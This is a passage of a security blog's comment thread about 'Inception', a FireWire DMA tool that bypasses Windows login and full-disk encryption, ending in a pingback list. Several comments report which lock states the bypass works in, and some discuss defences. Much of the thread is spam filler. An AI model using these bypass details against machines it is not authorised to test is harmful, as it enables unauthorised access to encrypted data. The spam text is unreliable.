      Also – for anybody else reading this – are you experiencing the same issues?

      • Kurt H Hanssen

        Hi Carsten
        Yes, I’m in Oslo from mon 3. to thu 6. March
        I have the machines available for you and we could have a look at these issues. Just let me know. I send you a SMS


  70. Chris Taylor

    I think this tool is excellent and have been testing it as a method of conducting live computer forensics on a suspect’s machine. I think one way this could be improved would be to add a hashing feature in order to verify the integrity of the RAM image, therefore helping to make the image admissible as evidence.


  71. jk

    I understand that a native or pci firewire port is needed at the target system, but is it necessarily needed at the host?
    and would a firewire-usb adapter work if it was connected to a usb express card?
    (And i had to write trash into the website label since it didnt want me to post a comment else.)

  72. Heinz Kreft

    Hi Carsten,
    Your Inception tool is a great proof of concept how difficult it would be to establish a good protection for unsafe platforms and is also an excellent demonstration of your personal capabilities …

    My reason here is to put an idea on the table I’ve had a long time im my head and so far I do not found such a thing on the Internet. I would like to ask you and the people here what do they thing about it.

    I called this currently not existing tool “ICT RipCord”. It should help to make PC’s a little bit safer against DMA & Cold Boot Attacks in the following way:

    A small system service on the PC (e.g. Windows, OSX) and an APP on a Smartphone (IOS, Android) work together as a “dead man switch”. They establish a VPC using (at install time) selfgenerated root certificates (no dependence from any third party) using Perfect Forward Secrecy (OTP session keys established by the Diffie-Hellmann-Protocol (DHP)). This channel is then used for a simple “ping-pong protocol” to make sure that everything is ok. If the so protected PC is not able to get a valid answer within a preset timeframe, the PC fails safe: Service stopps the system, (optional) zeros the RAM and force the PC to go down (forgetting the effected memory keys).

    This can limit the timeframe for an attacker having physical control over the PC-Victim to capture the key in memory.

    If the owner of the authentication token (the Smartphone with the auth-APP) detects his PC stolen, under attach or even forgotten to be switched off, he simply turns off the authentication service. There is no big issue, if this tool downs the PC in the case the network goes down because the legal owner of the PC is in general able to enter the key of the previously installed full disk encryption system.

    I am interessed to hear pros and cons about this.
    Thanks a lot,


  73. Andy

    Hey, this tool really is cool :-)
    I will use this tool to silence some of the loud-mouthed guys here claiming that encrypting a PC without activating PBA is enough security …

    Something I noticed: Using Ubuntu 12.4 LTS with all required stuff added to attack a McAfee EEPC-encrypted Win7-64 Enterprise system.

    Attack works fine for the first attempt (PBA is passed, Win7 boots up, user logs in the regular way, screen is locked), unlock the screen is possible w/o password.
    When in this same session the screen then is locked again using WIN-L, the next attack fails (at around 29xx MiB – system has 4GB) with some firewire I/O error.

    Any specific reason for that ?

    After the system has been rebooted and a user logs in the regular way, and then locks the screen, the attack works again. Not really an issue, as one would expect an attacker to NOT lock the screen :-)
    Ony, assuming that the screen saver hits during e.g. copying the data off the attacked PC, it can’t be unlocked again, which can be annoying. (no, one can’t disable the screen saver, if the settings are done via GPO).


  74. Andy

    Hi Carsten,

    (somehow the sort order of this posts is screwed up ?! It’s not ordered by date …)

    to protect a PC, one needs to know what a potential attacker needs to know of have, so: As I understood this tool, to log on to the victim PC (assuming a Windows system to be attacked), always an existing and valid local user account is required ?!

    I tried the following (all on Win7-64 as victim, joined into an AD domain):
    – System booted and domain account logged in, screen locked, network connected: Works, can unlock w/o password.
    – Same system, screen locked again: Won’t work, Firewire I/O error !
    – System booted, but nobody logged on, using the last logged-on domain account, network connected: Nope, no way !
    Tool says OK, but can’t log on. Seems the code to verify a domain account is not patched.
    – System booted, nobody logged on, using the last logged-on domain account, NO network connected: Works, can log on w/o password.
    – Same system, user logged off, same user logged on again: Still works, can log on again, no need to re-run the tool.
    – System booted, nobody logged on, using arbitrary local account: No way, unknow user!

    That means: A potential attacker always needs to know a valid local computer account (or a valid domain account that has cached credentials) on the victim. If the local administrator is renamed (or disabled and/or no local user is know or does exist – any idea here ?), it is impossible to log on. If the last logged-on user it not displayed and no user is known – impossible to log on (after using Inception).

    To achieve this, windows can be set to not display the last logged-on, and the local accounts can be renamed or deleted/disabled.

    I therefore would say: If an attacker has no clue which account is valid to log on, there’s no way to get in ?!
    Anybody disagrees ? Did I miss anything ?

    Is there a way to locate a valid user account / cached credentials in the memory dump without knowing it before ?

    (Carsten, let me know if you want some more things tested …)


  75. Bing

    Hey there! I’ve been following your site for a while now and finally got the courage to go ahead and give you a
    shout out from Austin Texas! Just wanted to say keep up the great job!

  76. Toney

    Everyone loves what you guys are up too. Such clever work and coverage!
    Keep up the fantastic works guys I’ve included you guys to my blogroll.

  77. Humberto

    Thanks for every other informative site. The place else may just I am
    getting that kind of info written in such a perfect manner?
    I have a venture that I am just now running on, and I’ve been at the glance out for
    such information.

  78. kontynuować

    After going over a handful of the blog posts on your site, I seriously like your technique
    of writing a blog. I bookmarked it to my bookmark webpage list and will be
    checking back soon. Take a look at my web site too and tell me your opinion.

  79. how to drive an atv

    In addition to bringing your stun master along, you also need to assure the security
    needs of your family. For persons 16 years and older
    the ATV size is over 90 cc. The truck comes in two-wheel
    drive or four-wheel drive, and can pull a load of about 13,000
    to 16,000 pounds, which is usually sufficient for hauling an
    ATV or fun runner.

  80. Amazing software that give you unlimited youtube views from REAL people 24 hours a day.

    This software are certain to get you thousands of views.

    It is usually a peer to fellow traffic exchange for virtually every website.
    The views you will get are completely real and from real people and they must view for any specific time
    duration of the choosing. I get this to be an outstanding tool for
    getting fast large amounts of youtube vistas. I can average
    one thousand views per time.

  81. Andrea


    I tested inception on windows 7 32 and 64 bit with SP0 and SP1 and it doesn’t working. :(

    Please, can you test this system?

    Thank you.

  82. Giovani

    Hi Carsten,

    first of all, thanks for your excellent tool! However I’ve got some trouble with my recently installed PCIe controller. The DMA attack works without any problems. But the memory analysis shows that the dumpfile is broken.

    Attacker: Ubu 12.04.3 native 1394
    Victim: Win7SP1x64 4GB RAM 1394 on PCIe_x1
    Tool: Volatility 2.3.1

    • Carsten

      DMA access over FireWire is not atomic unfortunately, so currently there’s no fix for this as volatility expects an atomic memory copy.

  83. ysminnpu

    is it possible to detect the windows version before attack? this can save attacking time because we only need to search specific signatures for that windows version.

  84. Andrea


    I tested the attack of unlock password of inception on windows 7 32 and 64 bit with SP0 and SP1 and it doesn’t working. :(

    Please, can you test this system?

    Thank you.

  85. Anders Karlsson

    Inception v.0.3.5 no longer finds any signature after patching my Windows 7. Winver version is: 7601 SP1, version of msv1_0.dll is: 6.1.7601.22616
    It has worked before until recent patches. How do I find the new signature?

  86. lockedbits

    after some updates bitlocker doesnt let me boot into Win8.1 anymore because “winload.efi” was modified and I am forced to enter the recovery key now… recovery key is saved in keepass on the encrypted drive… is there any way to bypass that recovery key menu with inception? the notebook has no firewire so I have to put the HDD in another computer and buy a PCIe FW Card – dont know if this could work because of the tpm chip?

  87. Sir.Costy

    Can the Inception tool unlock and escalate privileges if you are already login (logon)? Mean after entering the in the user account? Or it is working only when the logon window it is shown at the beginning?

  88. bittorrent spartan wars hack for android

    Write more, thats all I have to say. Literally, it
    seems as though you relied on the video to make your point.
    You clearly know what youre talking about, why waste your intelligence on just posting videos
    to your weblog when you could be giving us something informative to read?


    Fantastic beat ! I would like to apprentice while you amend your web site, how can i subscribe for a blog web site?
    The account helped me a acceptable deal. I had been tiny bit acquainted of this
    your broadcast offered bright clear idea

  90. Justina

    If you do your research, you wil find that 91 % oof all the jobs at hopme
    on the internet are scams. Article Source: you buy any online prodhct tto make extra money, go to Review – MOZ.
    Becoming an afffiliate for a product vendor wjll enable yyou sell their products for a percentage off the sale.

  91. free rp no download

    I drop a comment whenever I like a post on a website or I have something to valuable to contribute to the discussion. Usually
    it’s triggered by the sincerness communicated in the post I read.

    And on this post Inception | Break & Enter. I was moved enough to drop a thought :-) I actually
    do have 2 questions for you if you tend not to mind.

    Could it be only me or do a few of the remarks look as if
    they are left by brain dead people? :-P And, if you are posting on additional sites, I would like to keep up with you.
    Could you make a list the complete urls of all your social sites like your
    linkedin profile, Facebook page or twitter feed?

  92. boots sold

    Greetings from Ohio! I’m bored to death at work so I decided to browse your site on my iphone during lunch break.
    I love the information you present here and can’t wait to take a
    look when I get home. I’m shocked at how fast
    your blog loaded on my mobile .. I’m not even using WIFI, just 3G ..
    Anyhow, good blog!

  93. best skin care products

    Attractive element of content. I just stumbled upon your site and in accession capital to assert that I acquire
    actually enjoyed account your weblog posts. Any way I will be subscribing to your
    feeds or even I success you get entry to persistently quickly.

  94. trang trí nhà hàng

    Velvet is gorgeous for a winter wedding, but far from ideal for an outdoor wedding in the summer.
    That’s why it’s so important to show your appreciation with
    bridal party gifts. This portion of the wedding can be formal, informal, or a mix of the two.


    For this you should do some research on the internet and invite a creative planner.
    Yoou like to shkw off your knowledge of things, and often don’t think before you
    speak. Thhe transition from a tradotional office worker to work from home employee, however, remains difficult for many employees.

  96. Curious User

    Hey Carsten,

    I haven’t tried your tool yet but am very curious on how to mitigate such an attack. Maybe you can help me with the following questions:

    1) From what I understand a DMA attack *always* needs driver support from the OS. So prohibiting the installation of SBP2 devices via Windows Group Policies should be enough to prevent an inception as well as reading encryption keys from memory? There is no way to access memory without the OS actively allowing it?

    2) As far as I know, since Windows 8.1 SBP2 device drivers are only installed if a user is interactively logged on to the system. So running the attack on a locked workstation will not succeed.

    3) Does this type of attack only apply to FireWire (i.e. SBP2) or would it theoretically be possible to develop a PCIe device that simply dumps memory contents to some external storage?

    4) Does Bitlocker detect the insertion of pcmcia or PCIe cards or the removal of RAM at boot time? A way to overcome the 4GB barrier could be to simply remove the additional RAM and thus force the OS to use the lower address space.

    Best regards,

  97. personal finance articles for high school students

    I comment each time I appreciate a post on a website or if I have something to valuable to contribute to the
    discussion. It is a result of the sincerness displayed in the article I read.
    And after this post Inception | Break & Enter.

    I was excited enough to drop a comment ;-) I actually
    do have a couple of questions for you if it’s okay. Is
    it simply me or does it look like like a few of the remarks look like left by brain dead folks?

    :-P And, if you are posting on additional sites, I’d like to follow anything fresh you have to post.
    Could you list every one of your shared sites like your twitter feed, Facebook page
    or linkedin profile?

  98. IPhone 6 Vs Samsung Galaxy S5 Vs HTC One (M8) Vs Sony Xperia

    Samsung Galaxy Note, Samsung I9100 Galaxy S II,
    Samsung Galaxy S II Skyrocket i727, Samsung Galaxy S II Epic 4G Touch, Samsung
    Galaxy S II T-Mobile, Samsung Galaxy S II AT&T, Samsung Galaxy Tab 10.1″, Samsung I927 Galaxy S II, Samsung Galaxy S II 4G, Samsung Gravity SMART, Samsung Hercules, Samsung Exhibit 4G and Samsung Infuse 4G. Sony Xperia S, Sony Ericsson Xperia Arc S, Sony Ericsson Xperia Ray, Sony Tablet S 3G, Sony Ericsson PLAY gallery, Sony Ericsson XPERIA Arc and Sony Ericsson Xperia X10.

  99. search engine positioning

    Website design solutionsencompass a wide
    variety of options that help in building an optimized site.
    You will take a tiny search engine marketing slice of the case setting
    capital or infrastructure and that involves designing the web site beyond
    belief? Also be sure that you need to have search engine marketing a
    business to its potential customers. And unfortunately, is good, if you don’t intend to help websites perform to specific email address.

  100. house to buy in london

    Do you mind if I quote a couple of your posts as long as I
    provide credit and sources back to your weblog? My website is in the exact same
    niche as yours and my users would really benefit from a lot of the
    information you provide here. Please let me know if this okay
    with you. Many thanks!

  101. animal porn

    you are actually a just right webmaster. The site loading pace is incredible.
    It sort of feels that you are doing any unique trick. Moreover,
    The contents are masterwork. you’ve done a wonderful
    task on this topic!

  102. Sir.Costy

    CooL !!! Saw your plans about a FIREWIRE payload few months ago and was waiting this moment.
    Just hope you will not stop and add to Implant support for Windows Xp also. Greath work. Chears….

  103. Humberto

    Contractors for Handicap Stair LiftsContractors for handicap stair lifts that meet the requirements.
    Good ones usually are immediately monitored by the hour.
    Searching on internet provide and therefore, they know.
    Gas connections and flues for heating, plumbing,
    HVAC systems, network cabling. A recent decision in the world
    people use the” work made for hire statement in your restoration contractor has workman s compensation. This said, I recommend getting current and valid license or you seek financing for your home had background tests completed?

  104. kim kardashian sex video free

    Hey, I came across your website through Search engines all at once since seeking a associated make a difference, your website surfaced, it appears to be like very good. I’ve truly book marked to be able to our favourites features and functions|added onto bookmarks.

  105. search engine company

    The second most used web-development environment in the design of
    an About Us page visible on the other, giving users a pleasing and functional.
    The design of your shopping cart, database preparation and simulation materials and ends up in attracting
    online customers.

  106. Danae

    However, after recording a duet between Tritt and Jackson bondsman portrays his grandson Billy Jackson Nicoll.
    Couples and families of missing children, adults or does he feel the stress of everyday life.

  107. Valentine Quotes

    Hello there! Do you know if they make any plugins to safeguard against hackers?
    I’m kinda paranoid about losing everything I’ve worked hard on. Any

  108. win powerball mathematically

    Hey just wanted to give you a quick heads up aand let you know a few of the images aren’t loading correctly.
    I’m nnot sure why but I think its a linking issue. I’ve tried it in ttwo
    different internet browsers and both show the same outcome.

  109. Vlad

    Do you need any “special”, “crossover” firewire cable or 4 Pin to 4 Pin Firewire DV iLink Male to Male IEEE 1394 is fine?
    Thanks a lot


  110. imgur

    Enterprises having a large website with a lot of traffic
    influx will require the reseller hosting package. Try your better to find the web hosting service without down time.
    These connections and resource sharing can even be made across different operating systems such as Unix, Linux and Microsoft Windows.

  111. j

    We’rе a gwggle of volunteers аnd opening a new scheme in oսr
    community. Youг web site рrovided us witҺ helpful іnformation tο work on. Yoս’ve performed a formidable job аnd our wholе ցroup shal be thankful to you.

  112. J4NUS

    “There are plenty of other (and better) ways to hack a machine that doesn’t pack encryption.”

    Well, nice to hear. Any Suggestions?

  113. sport

    I like what you guys are up too. Such clever work and coverage!
    Keep up the wonderful works guys I’ve added you guys to my own blogroll.

  114. kredittkortlan.Blogg.No

    %first_paragraphFeaturing Carl Zeiss optics and xenon flash, the N8 is the first Nokia camera phone to utilise a 12 megapixel camera sensor size of 1/1. Among its connectivity features are HDMI out, USB On-The-Go and Wi-Fi 802. 11 b/g/n support; the N8 is also the first device to feature a Pentaband 3. 83, making it the largest image sensor in a camera phone at the time of its launch. The Nokia N8 is a Symbian^3 smartphone from the Nokia Nseries. It was Nokia’s flagship device for 2010. The N8 display features a 3. 5-inch (89 mm) 360 x 640 pixel capacitive touchscreen, and is the first Nokia smartphone to run on the Symbian^3 operating system with single-tap interaction, featuring the addition of multiple home screens, customisation abilities, and multi-touch capabilities with gesture support.

    Dont bother with the settings described above. But how do you drain the battery when Windows wont let you do just that? (If they did, it would crash Windows. Theyre not safe (you might forget to change them back), they may not be getting an accurate reading, and they quite possibly wont let you set the critical Newest ASUS N73SW Battery level to 0 percent.

    Im a buff within of the Nokia N97 minis keyboard. 0 firmware inside the genuine Nokia N97, long-press inside the keyboard outputs the corresponding symbolic representation on best within of the letters. as opposed to the Nokia N900, there are really spaces in between the buttons so they do not really feel cramped. Just such as the the 2. I obtained utilized toward the layout very quickly found myself typing texts and emails totally fast. The buttons provide adequate tactile feedback, but I advise leaving the keyboard seems ON for just about any a good offer better typing experience.

    Bizarrely, if theyve beaten anything, Nokia have wiped out away enthusiasm for the N97; the two handsets will go on profit alongside each and every other, also to the united kingdom store even has the N97 mini at 429 also to the genuine at 449. getting lived using the N97 mini we are not optimistic why anybody would plump for the original, frankly. Nokia certainly have some exceptional principles left in them, however the N97 mini feels like what the genuine N97 must possess been, instead of a brand name new product in its individual right. As for the mini itself, we should admit to getting much more enthusiastic concerning the Maemo OS and its possible than we are about this present device.

    Nokia recommends that you should only use Nokia specific chargers though the device gets charged with any micro-USB chargers. It accepts either use a standard-pin Nokia charger or a flat pin micro-USB charger as well. The device also gets charged when connected to a computer through USB. Power
    Nokia N8 has dual charging options.

    Whenever you use the Rock n fold chair you feel the luxury feeling. The designs of the rock n fold chair are look more simple and beautiful. Setting Up Your Rock N Fold Chair: Then you need to have the special Rock n fold chair that is specially made up for you when you are watching movies and playing video games. The Rock n fold chair are comes in different size and features, the common size or dimension of the Rock n fold chair is about 36″x 18″x 24″ and the weight is with in 20 pounds. Whenever you finished your work and you are free then you want to watch movies and play video games or you want to call your friends at your home and enjoy your free time and holydays.

    “It’s not the best weather, but we’re really looking forward to it,” says the German. Sorry, Sky Sports News HQ. “First of all we’re going to celebrate properly and then hopefully we can build on it next season. ”
    The best habit to get into. “I think the fans will really enjoy it. 11:15 am Per: “Everything is achievable” Off they go now and Per Mertesacker is talking to Sky Sports News. com/OfN65m6qIf
    – Aaron Ramsey (@aaronramsey) May 30, 2015 “With this squad everything is achievable!

    Its also worth noting the fact that Nokia N79 is much less pricey compared to Nokia N85. And when you hold into account that concerning the only main difference there is in between these two handsets could possibly be the actuality the fact that Nokia N85 can demand by utilizing USB, it is apparent the fact that N79 provides one of the most bang for the buck.

    Well, we’re going to look at that as well as a good offer much more within of just one of our trademark reviews, commencing using the unboxing inside the following page. We totally wish it’s obtained many different tricks up its sleeves so it could suit up the genuine N97 a terrific battle and differentiate adequate previous dimension and pricing. Still the decreased show (and typically whole body size) is totally a welcome alter for a lot of users, who utilized to arrive throughout the Nokia N97 intolerably bulky.

    The Nokia N8 is another one of those handsets that leaves us conflicted. If youre okay with Symbian 3 and are of the mind frame that hardware is king and multimedia options rule, then we can whole-heartedly recommend the Nokia N8. If however, your eyes are set on an OS that gives you greater versatility in the future, perhaps you might want to look elsewhere. Its got some truly amazing elements: the camera, the video playback, the luscious build quality all make us want to forget everything average about it. That said, you wont find a better camera phone on the market, and you certainly wont find a more versatile video playback phone either. Symbian 3 just doesnt visually stimulate us enough to make us want to use it, with the home screens and menus looking dated, Syncing contacts and calendars with anything other than Ovi being unintuitive and an internet experience that could be improved upon.%

  115. health vacancies

    My brother rcommended I may like this website. He wass entirely right.
    This publish actually made myy day. You cann’t believe simply
    how a lot time I had spesnt for this information! Thanks!

  116. maduranga

    my laptop BCD settings are changed and prompting to put bitLocker key to proceed when boot up. I don’t have the key file and i can’t proceed with it.
    The laptop contain all my valuable data and is it possible to use Inception to recover my keys. i am using win7. Please help.

  117. funny t shirt

    Thank you for the auspicious writeup. It in truth used to be a entertainment account it.
    Glance complex to far added agreeable from you! By the way, how could we communicate?

  118. find more

    Definitely believe that which you stated. Your favorite reason seemed to be on the net the simplest thing to be
    aware of. I say to you, I definitely get irked while people consider worries that they just do
    not know about. You managed to hit the nail upon the top as well as defined out the whole thing without having
    side-effects , people can take a signal. Will probably be back
    to get more. Thanks

  119. deezer mobile

    TCV has hip the history furthermore invested hip real estate website Zillow Inc.
    Hailed as the ‘You – Tube of Audio,’ Audiboom has doubled its share price from just
    5GBX earlier this year to 15GBX after its reverse merger with One Delta.

    99 a month which will allow the user to listen without advertisements.

  120. the hobbit kingdoms generateur

    Greetings! Quick question that’s completely off topic. Do you know how to make your site mobile friendly?
    My site looks weird when browsing from my iphone 4. I’m trying to find a theme or plugin that might be able
    to resolve this issue. If you have any recommendations, please share.
    Thank you!

  121. king of thieves hack

    If you follow these strategies, will you win every game of Golf Solitaire.
    He wasn’t there in my playthrough though, so don’t worry too
    much about it. Merrill is the ‘First” apprentice for the Dalish clan.

  122. Russian girls

    For my money, Maria Kirilenko is the hottest women tennis player of all-time from any country.
    One year I even had a class inquire what “I’m” meant and we started
    a whole beginner unit on contractions (first grade curriculum).
    If you do a mistake of overwhelming her during the first kiss,
    she may change her mind.

  123. William

    The advantage of a fixed-rate mortgage is that your rates of interest stays the same during the financing
    period, so you understand specifically just how
    much your regular monthly repayment will be.

  124. Janessa

    The fundamental FHA mortgage insurance program is Home
    mortgage Insurance coverage for One-to-Four-Family Residence (Area 203(b)).

  125. Tami

    FHA lendings do have a significant downside given that the passion billed gradually is commonly more than that of traditional set rate lendings.

  126. Niamh

    While an apartment unit will have a few more demands compared to
    a typical home, it is still a good financing to think about.

  127. frullatore

    fantastic points altogether, you simply received a new
    reader. What could you suggest about your publish that you just made some days in the past?
    Any positive?

  128. Jerrod

    My partner and I stumbled over here by a different website and thought I might as well check things out.
    I like what I see so now i’m following you. Look forward to exploring your web page for a second time.

  129. fresatrice

    May I just say what a comfort to find an individual
    who really knows what they are talking about on the internet.
    You actually realize how to bring a problem to light and make it important.
    More people need to read this and understand this side of your story.
    I can’t believe you are not more popular because you surely possess the gift.

  130. disco duro ssd

    Simply wish to say your article is as astonishing. The clearness in your publish
    is simply great and that i could assume you are knowledgeable on this subject.
    Well together with your permission allow me to seize your RSS feed to stay up to date with
    forthcoming post. Thank you a million and please continue the rewarding work.

  131. test

    When I originally left a comment I appear to have clicked on the -Notify me when new
    comments are added- checkbox and from now on every time
    a comment is added I receive four emails with the exact same
    comment. There has to be an easy method you are able to remove me from that service?

  132. mejores cochecito de bebe del 2015

    I do believe all of the ideas you have introduced in your post.
    They’re really convincing and can definitely work.
    Still, the posts are very brief for novices. May just you please extend them a little from
    subsequent time? Thank you for the post.

  133. paul

    I used a 4pin cable and it does not work:
    Error: Could not detect any FireWire devices connected to this system

    could one please post a link to a working FW-Cable? Both Computers have 4pin build in FW-Connector

  134. google

    Hello, all the time i used to check website posts here in the early hours in the break of
    day, since i enjoy to find out more and more.

  135. racing rivals generateur

    First off I would like to say fantastic blog! I had
    a quick question which I’d like to ask if you don’t mind.
    I was interested to find out how you center yourself and clear
    your mind prior to writing. I have had a difficult time clearing my
    thoughts in getting my thoughts out there. I truly do take pleasure in writing but it just seems like the first 10
    to 15 minutes are generally wasted simply just trying
    to figure out how to begin. Any suggestions or hints?



    you’re truly a excellent webmaster. The website
    loading speed is incredible. It sort of feels that you’re doing any distinctive trick.
    In addition, The contents are masterwork. you have done a fantastic job on this matter!

  137. lisseu vapeur

    Have you ever considered about adding a little bit more than just your articles?

    I mean, what you say is fundamental and all. Nevertheless just imagine if you added some
    great graphics or videos to give your posts more, “pop”!
    Your content is excellent but with pics and clips, this site could definitely be one of the best in its field.
    Wonderful blog!

  138. appareil photo numerique

    Undeniably believe that which you stated. Your favorite reason seemed to be on the web the simplest thing to be aware
    of. I say to you, I definitely get annoyed while
    people think about worries that they plainly don’t know about.
    You managed to hit the nail upon the top as well as defined out the whole thing without having side-effects , people can take a signal.
    Will probably be back to get more. Thanks

  139. deshumidificateur

    Admiring the persistence you put into your site and
    in depth information you offer. It’s nice to come across a blog every once in a while that isn’t
    the same old rehashed information. Fantastic read!
    I’ve bookmarked your site and I’m including your RSS feeds to my Google

  140. cortacesped

    Thanks on your marvelous posting! I certainly enjoyed reading it, you might be a great author.I will make certain to bookmark your blog and will come back someday.
    I want to encourage you to continue your great work,
    have a nice evening!

  141. Køkkenmaskine test ar 2016

    I do not even know the way I ended up right here, however I believed this submit
    used to be good. I don’t recognise who you are but definitely you’re going to a famous blogger if you
    aren’t already. Cheers!

  142. correpasillos comparativa

    I’m amazed, I must say. Rarely do I encounter a
    blog that’s both educative and amusing, and let me tell you, you have hit the nail on the head.
    The problem is something not enough folks are speaking intelligently about.
    I am very happy I came across this in my search for something regarding this.

  143. pieces super mario run

    Some supply spy application for mobile phone in impossibly reduced prices, be cautious, there might be a hitch there.
    For example, you maybe the boss of a company and suspect your employee
    is abusing his or her phone privileges. By reading their text messages, you
    can find if your child has a problem with drugs, anorexia, bulimia, alcoholism, or unwanted pregnancy.

  144. migliore giradischi

    fantastic points altogether, you simply received
    a brand new reader. What could you recommend in regards to your submit that you simply made some days in the past?
    Any certain?

  145. stampante multifunzione opinioni

    Having read this I thought it was extremely enlightening.
    I appreciate you finding the time and energy to put this informative article together.
    I once again find myself spending a lot of time both reading and leaving comments.

    But so what, it was still worth it!

  146. paul

    im gettiing an error trying to install inception
    Warning: setuptools not available, you will have to install manually
    Traceback (most recent call last):
    File “./”, line 32, in
    raise e
    File “./”, line 28, in
    from setuptools import setup, find_packages
    ImportError: No module named ‘setuptools’
    thanks for any help

  147. paul4tune

    ok i solved the issue by downloading the setuptools and dragging the folder inside the inception folder then installing inception my next question is once i completed a memory dump how do i save the .bin file

  148. free movies

    Нi, і think that i saw you visited my site thus i
    cаme to “return the favor”.I am attempting to find
    things to improve my web sіte!I suppose its ok to use some of your ideas!!

  149. cortapelos

    It’s a pity you don’t have a donate button! I’d without a doubt donate
    to this fantastic blog! I guess for now i’ll settle for bookmarking and adding your RSS
    feed to my Google account. I look forward to new updates and will talk about this
    site with my Facebook group. Talk soon!

  150. machine a pain

    Tremendous things here. I am very satisfied to
    see your article. Thanks a lot and I am looking
    ahead to contact you. Will you kindly drop me a mail?

  151. telecamera ip

    great issues altogether, you simply won a brand new reader.
    What would you suggest in regards to your submit that you made a few days
    ago? Any sure?

  152. Teclado Inalambrico

    Do you have a spam issue on this site; I also am a blogger, and I was curious about
    your situation; many of us have developed some nice procedures and we are looking to swap techniques with other folks, please shoot me an email if interested.

  153. vaporiera

    I used to be recommended this web site by my cousin. I’m not sure whether or
    not this post is written by way of him as no one else recognize such special
    approximately my problem. You are amazing! Thanks!

  154. Amado

    I think what you posted was very logical. But,
    think on this, suppose you were to write a awesome headline?
    I am not saying your content is not good, but what if you added something that makes
    people desire more? I mean Inception | Break & Enter is a
    little boring. You ought to peek at Yahoo’s front page and note how they write post headlines to get
    people to click. You might add a video or a related pic or two to grab readers excited about everything’ve written. Just my
    opinion, it could bring your blog a little livelier.

  155. วีดีโอ

    Mɑgnifіcent goodѕ from yoս, man. I’ve understɑnd your stuff
    previous to and you’re just too magnificent. I aϲtually like what you’ve acquired here, certainly like what you are saying and the way in which you
    say it. You make it entertaining and you still care for to ҝeep it wise.
    I can not wait to read far morе from you. This is really a wonderful web

  156. auriculares bluetooth baratos

    You’re so awesome! I don’t believe I have read through anything like that before.

    So wonderful to discover another person with some genuine thoughts on this topic.

    Seriously.. many thanks for starting this up. This web site
    is something that is needed on the web, someone with a
    little originality!

  157. london

    Aw, i thought this was a really nice post. In thought I have to put in writing this way additionally taking time
    and actual effort to create a top nnotch article but what / things I say I procrastinate alot by no indicates
    seem to get something accomplished.

  158. live chat

    You actually make it appear really easy along with your presentation but I to find this topic to be really one thing that I feel I would never understand. It sort of feels too complicated and very huge for me. I am having a look ahead on your subsequent post, I’ll attempt to get the dangle of it!

  159. micro chaine hifi

    With havin so much content do you ever run into any problems
    of plagorism or copyright infringement? My website has a lot of
    exclusive content I’ve either written myself or outsourced but it seems a lot
    of it is popping it up all over the web without my permission.
    Do you know any ways to help prevent content from being ripped off?
    I’d genuinely appreciate it.

  160. bravoxy

    Hi guys!
    I have a windows 8.1, 64 bit OS with full disk encryption. It is not possible to log-on to the computer. The only local admin password is forgotten. The tool successfully dumped the whole memory but not able to find the signature for win 8.1… Anybody have already make a signature for Win 8.1 64 bit? Thx. Any tool that can search bitlocker recovery key in the memory dump? (for win 8.1 ,64 bit) Thx

  161. attis

    Based on Bravoxy’s problem, I’ve made a direct dll patch (W8.1 x64) with NOPs – let you in with any passwords. Still need tests on through the firewire to find the proper adressing.

  162. John McCash

    This tool is really awesome. One thing I wish for, though, is the ability to run it from an inconspicuous mobile device of some kind. A 3rd generation iPod would be ideal, and I actually have one, but it appears that the most recent iPodLinux uses an older kernel than is supported by Inception. Do you know of any way to get Inception working on this platform (I did see what appeared to be some references on google to later kernels on this device, but no specific instructions) or else any other small mobile device that has a Firewire or other supported Inception interface?
    Thanks much

  163. John McCash

    One other possibility that occurs to me is that somebody could do a custom firmware for a wireless PC card of some kind that would allow inception to be run from any 802.1 enabled host against the system into which it is inserted. Know whether anyone might be working on anything like that? The same trick would, of course, work with other types of PC card.

  164. Carsten

    I don’t know if anybody is working on something like this. Running inception on an ipod would require you to get a newer kernel to run on it first, unfortunately.

  165. paul4tune

    how can i save the memory dump , thought id reply to your post in the hope you can actually see it as your last comment was in 2014




  1.  Fire through the wire | Break & Enter
  2.  Download winlockpwn | Break & Enter
  3.  Virtualized Firewire attack « DiabloHorn
  4.  Adventures with Daisy in Thunderbolt-DMA-land: Hacking Macs through the Thunderbolt interface | Break & Enter
  5.  Alternative to winlockpwn: libforensic1394 | Break & Enter
  6.  winlockpwn on Ubuntu | Break & Enter
  7.  Video – Hacking OS X FileVault2 over Thunderbolt with Inception | Break & Enter
  8.  Cool Tool Tuesday Ed. I | TechByTom
  9.  Week 17 in Review – 2012 | Infosec Events
  10.  Lost+Found: iPhone bans and unlocks, Firewire exploits and Linux triage »
  11.  lost+found: iPhone zeigt sich verschlossen, Firewire hingegen offen, Avast hält Macs den Rücken frei | – News Blog aus vielen Bereichen
  12.  Speaking session at OWASP NYC Chapter | Break & Enter
  13.  Inception | About Security
  14.  Links to tools demonstrated at OWASP NY/NJ chapter meeting | Break & Enter
  15.  Links to tools demonstrated at OWASP NY/NJ chapter meeting | About Security
  16.  Breaking Full-Disk Encryption Using FireWire « Decorator Pattern
  17.  Week 41 in Review – 2012 | Infosec Events
  18.  Elcomsoft Forensic Disk Decryptor « CC's Security Journal
  19. — unlock any machine via firewire and then defeat BitLocker, TrueCrypt, FileVault, etc « Mick's Mix
  20.  inception — unlock any machine via firewire and then defeat BitLocker, TrueCrypt, FileVault, etc « Mick's Mix
  21.  Breaking Full-Disk Encryption with FireWire | Slingshot Orbit of Technology
  22.  Inception: a tool for compromising the slumber of computers with full-disk encryption – Boing Boing | Rob's Personal Aggregator
  23.  رادیو گیک. شماره بیست و یک، صدای یک دست
  24.  Uden fysisk sikkerhed er der ingen sikkerhed | Hennings blog
  25.  illmob » Inception
  26.  Truecrypt-, PGP- und Bitlocker-Festplatten entschlü |
  27.  lost+found: Passwort-Schlampen, Katzen-Payload und ein lulz-PoC | – News Blog aus vielen Bereichen
  28.  IT Secure Site » Blog Archive » Lost+Found: Password klutzes, cat payloads and a lulzy-PoC
  29.  Inception能入侵全盘加密的计算机 – 黑客新闻
  30.  between drafts | The Inception Tool: “Planting the Idea Into the Memory of the Machine That Every Password is Correct”
  31.  inception: new hacker tool « meditationatae
  32.  Four short links: 5 February 2013 - O'Reilly Radar
  33.  Elcomsoft Forensic Disk Decryptor v1.0.110 - Rapidshare Download Forum
  34.  Elcomsoft Forensic Disk Decryptor v1.0.110 - Download from Rapidshare, Extabit, rapidgator, mediafire, torrent
  35.  Elcomsoft Forensic Disk Decryptor v1.0.110 |
  36.  Elcomsoft Forensic Disk Decryptor v1.0.110 Download from Rapidshare, Rapidgator, Hotfile, Bitshare, Megaupload, Eextabit
